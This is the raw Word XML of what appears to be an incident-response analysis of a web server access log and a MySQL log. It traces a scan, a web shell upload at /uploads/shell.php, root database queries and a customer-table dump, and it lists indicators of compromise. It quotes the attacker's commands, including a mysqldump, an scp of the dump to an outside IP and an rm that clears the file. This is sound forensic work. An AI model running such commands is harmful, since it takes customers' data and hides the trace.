        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">178.62.228.28</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Commands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netstat -atunp</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sudo -l</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sudo mysql -u root -p</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sudo mysqldump -u root -p phl &gt; phl.db</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scp phl.db fierce@178.62.228.28:/tmp/phl.db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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rm phl.db</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Analysis of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">phl_access_log.txt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Overview</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phl_access_log.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> file contains HTTP access logs for the web server. It records requests made to the server, including the source IP, timestamp, request method, URI, response code, and user agent.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Key Observations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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Normal Traffic</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Requests from IPs like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">136.243.111.17</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138.201.202.232</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> are from a bot (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SiteCheckerBotCrawler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">). These are likely benign and part of routine web crawling.</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rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">136.243.111.17 - - [19/Feb/2022:21:56:11 -0500] "GET / HTTP/1.1" 200 491 "-" "SiteCheckerBotCrawler/1.0 (+http://sitechecker.pro)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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Suspicious Traffic</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IP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made a large number of requests to various URIs, many of which returned </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">404 Not Found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. This behavior is indicative of a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">directory traversal attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">brute-force scanning</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138.68.92.163 - - [19/Feb/2022:21:58:22 -0500] "GET /randomfile1 HTTP/1.1" 404 437 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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Successful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IP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successfully accessed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7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138.68.92.163 - - [19/Feb/2022:21:58:40 -0500] "GET /uploads/ HTTP/1.1" 200 1115 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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138.68.92.163 - - [19/Feb/2022:21:59:04 -0500] "POST /uploads/shell.php HTTP/1.1" 200 2655 "-" "curl/7.68.0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> request to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 suggests the attacker uploaded or executed a web shell.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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User Agents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used </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)</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curl/7.68.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. The use of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> indicates automated or scripted activity.</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Indicators of Compromise (IOCs)</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IP Address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138.68.92.163</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URIs Accessed</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/uploads/</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/uploads/shell.php</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User Agents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Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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curl/7.68.0</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Conclusion</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access log shows that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performed a directory traversal attack, successfully accessed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 and likely uploaded or executed a web shell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Analysis of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">phl_database_access_log.txt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Overview</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phl_database_access_log.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> file contains MySQL database access logs. It records connections, queries, and other database activities.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Key Observations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> connected to the MySQL database from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">localhost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2022-02-20T03:00:55.682704Z</w:t>
        <w:tab/>
        <w:t xml:space="preserve">    9 Connect</w:t>
        <w:tab/>
        <w:t xml:space="preserve">root@localhost on  using Socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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Exploration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queried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 to list tables and view the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18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2022-02-20T03:01:02.431609Z</w:t>
        <w:tab/>
        <w:t xml:space="preserve">    9 Init DB</w:t>
        <w:tab/>
        <w:t xml:space="preserve">mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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2022-02-20T03:01:02.433075Z</w:t>
        <w:tab/>
        <w:t xml:space="preserve">    9 Query</w:t>
        <w:tab/>
        <w:t xml:space="preserve">show tables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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2022-02-20T03:01:10.167274Z</w:t>
        <w:tab/>
        <w:t xml:space="preserve">    9 Query</w:t>
        <w:tab/>
        <w:t xml:space="preserve">SELECT * FROM user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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Exfiltration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switched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and dumped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18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2022-02-20T03:01:13.274934Z</w:t>
        <w:tab/>
        <w:t xml:space="preserve">    9 Init DB</w:t>
        <w:tab/>
        <w:t xml:space="preserve">phl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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2022-02-20T03:01:13.276443Z</w:t>
        <w:tab/>
        <w:t xml:space="preserve">    9 Query</w:t>
        <w:tab/>
        <w:t xml:space="preserve">show tables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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2022-02-20T03:01:21.694024Z</w:t>
        <w:tab/>
        <w:t xml:space="preserve">    9 Query</w:t>
        <w:tab/>
        <w:t xml:space="preserve">SELECT * FROM customers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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Dump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8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used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 to export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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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2022-02-20T03:01:46.748188Z</w:t>
        <w:tab/>
        <w:t xml:space="preserve">   10 Connect</w:t>
        <w:tab/>
        <w:t xml:space="preserve">root@localhost on  using Socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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2022-02-20T03:01:46.763710Z</w:t>
        <w:tab/>
        <w:t xml:space="preserve">   10 Query</w:t>
        <w:tab/>
        <w:t xml:space="preserve">show tables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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2022-02-20T03:01:46.775014Z</w:t>
        <w:tab/>
        <w:t xml:space="preserve">   10 Query</w:t>
        <w:tab/>
        <w:t xml:space="preserve">SELECT /*!40001 SQL_NO_CACHE */ * FROM `customers`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Indicators of Compromise (IOCs)</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root@localhost</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Databases Accessed</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mysql</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phl</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Tables Accessed</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user</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customers</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Commands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SELECT * FROM user</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SELECT * FROM customers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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mysqldump</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Conclusion</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database access log shows that the attacker gained access to the MySQL database, explored sensitive tables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and exfiltrated data using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Relating the Two Logs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Timeline of Events</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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Initial Reconnaissance</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scanned the web server for vulnerabilities, as seen in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phl_access_log.txt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They accessed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and uploaded or executed a web shell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Using the web shell, the attacker gained access to the MySQL database.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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They queried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databases, exfiltrating sensitive data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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Exfiltration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19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used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 to export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as recorded in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phl_database_access_log.txt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Connection Between Logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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web server access log (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phl_access_log.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) shows the initial attack vector (directory traversal and web shell upload).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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database access log (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phl_database_access_log.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) shows the subsequent exploitation, where the attacker accessed and exfiltrated data from the MySQL database.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Indicators of Compromise (IOCs)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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IP Address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138.68.92.163</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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Web Shell</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/uploads/shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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Databases Accessed</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phl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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Tables Accessed</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customers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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Commands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SELECT * FROM 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SELECT * FROM customers</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mysqldump</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t xml:space="preserve">1. **Open the Database File:**</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t xml:space="preserve">   - Use a database management tool (e.g., SQLite, MySQL) to open `phldatabasetables.db`.</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eastAsia="Times New Roman" w:cs="Times New Roman"/>
